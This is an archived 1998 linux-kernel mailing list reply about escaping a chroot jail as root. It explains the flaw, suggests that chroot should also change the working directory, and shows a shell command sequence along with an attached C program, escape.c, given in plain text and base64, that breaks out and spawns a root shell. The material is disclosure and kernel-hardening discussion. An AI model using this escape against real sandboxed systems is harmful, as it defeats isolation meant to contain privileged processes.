RE: Chroot breach in 2.1.100+

Jeremy Fitzhardinge (jsgf@sirius.com)
Sun, 20 Sep 1998 22:47:05 -0700 (PDT)

This message is in MIME format
--_=XFMail.1.3.p0.Linux:980920224705:6965=_
Content-Type: text/plain; charset=us-ascii

On 20-Sep-98 Alexander Viro wrote:
>
> In some cases chroot jail can be broken by process with UID==0.

Yes, you can do it trivially and portably, without relying on any special Linux
features:

# # set up chroot env
# cd chroot-jail
# chroot .
# pwd
/
# mkdir foo
# chroot foo
# # note, chroot does *not* change cwd
# cd ../../../../../..
# chroot .
# # now we're at real /

If you want to fix this, you make sure chroot also does a chdir. At the moment
the chroot syscall allows a process to have a cwd which is outside of the tree
based at its /. Even if you fix this, you can still use all the other attacks.

J

--_=XFMail.1.3.p0.Linux:980920224705:6965=_
Content-Disposition: attachment; filename="escape.c"
Content-Transfer-Encoding: 7bit
Content-Description: escape.c
Content-Type: text/plain; charset=us-ascii; name=escape.c; SizeOnDisk=589

#include <unistd.h>
#include <sys/stat.h>
#include <errno.h>

int barf(const char *msg)
{
perror(msg);
exit(1);
}

int main()
{
struct stat dot, dotdot;;

chdir("/");
mkdir("tmp", 01777);
chroot("tmp") == 0 || barf("chroot tmp");

stat(".", &dot) == 0 || barf("stat .");

for(;;)
{
stat("..", &dotdot) == 0 || barf("stat ..");

if (dot.st_dev == dotdot.st_dev &&
dot.st_ino == dotdot.st_ino)
break;
dot = dotdot;
chdir("..") == 0 || barf("chdir ..");
}

chroot(".") == 0 || barf("chroot .");

execl("/bin/sh", "/bin/sh", 0) == 0 || barf("exec");
exit(1);
}

--_=XFMail.1.3.p0.Linux:980920224705:6965=_
Content-Disposition: attachment; filename="escape.c"
Content-Transfer-Encoding: base64
Content-Type: application/octet-stream; name=escape.c; SizeOnDisk=589

I2luY2x1ZGUgPHVuaXN0ZC5oPgojaW5jbHVkZSA8c3lzL3N0YXQuaD4KI2luY2x1ZGUgPGVycm5v
Lmg+CgppbnQgYmFyZihjb25zdCBjaGFyICptc2cpCnsKCXBlcnJvcihtc2cpOwoJZXhpdCgxKTsK
fQoKaW50IG1haW4oKQp7CglzdHJ1Y3Qgc3RhdCBkb3QsIGRvdGRvdDs7CgoJY2hkaXIoIi8iKTsK
CW1rZGlyKCJ0bXAiLCAwMTc3Nyk7CgljaHJvb3QoInRtcCIpID09IDAgfHwgYmFyZigiY2hyb290
IHRtcCIpOwoKCXN0YXQoIi4iLCAmZG90KSA9PSAwIHx8IGJhcmYoInN0YXQgLiIpOwoKCWZvcig7
OykKCXsKCQlzdGF0KCIuLiIsICZkb3Rkb3QpID09IDAgfHwgYmFyZigic3RhdCAuLiIpOwoKCQlp
ZiAoZG90LnN0X2RldiA9PSBkb3Rkb3Quc3RfZGV2ICYmCgkJICAgIGRvdC5zdF9pbm8gPT0gZG90
ZG90LnN0X2lubykKCQkJYnJlYWs7CgkJZG90ID0gZG90ZG90OwoJCWNoZGlyKCIuLiIpID09IDAg
fHwgYmFyZigiY2hkaXIgLi4iKTsKCX0gCgoJY2hyb290KCIuIikgPT0gMCB8fCBiYXJmKCJjaHJv
b3QgLiIpOwoKCWV4ZWNsKCIvYmluL3NoIiwgIi9iaW4vc2giLCAwKSA9PSAwIHx8IGJhcmYoImV4
ZWMiKTsKCWV4aXQoMSk7Cn0KCg==

--_=XFMail.1.3.p0.Linux:980920224705:6965=_--
End of MIME message

-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.rutgers.edu
Please read the FAQ at http://www.tux.org/lkml/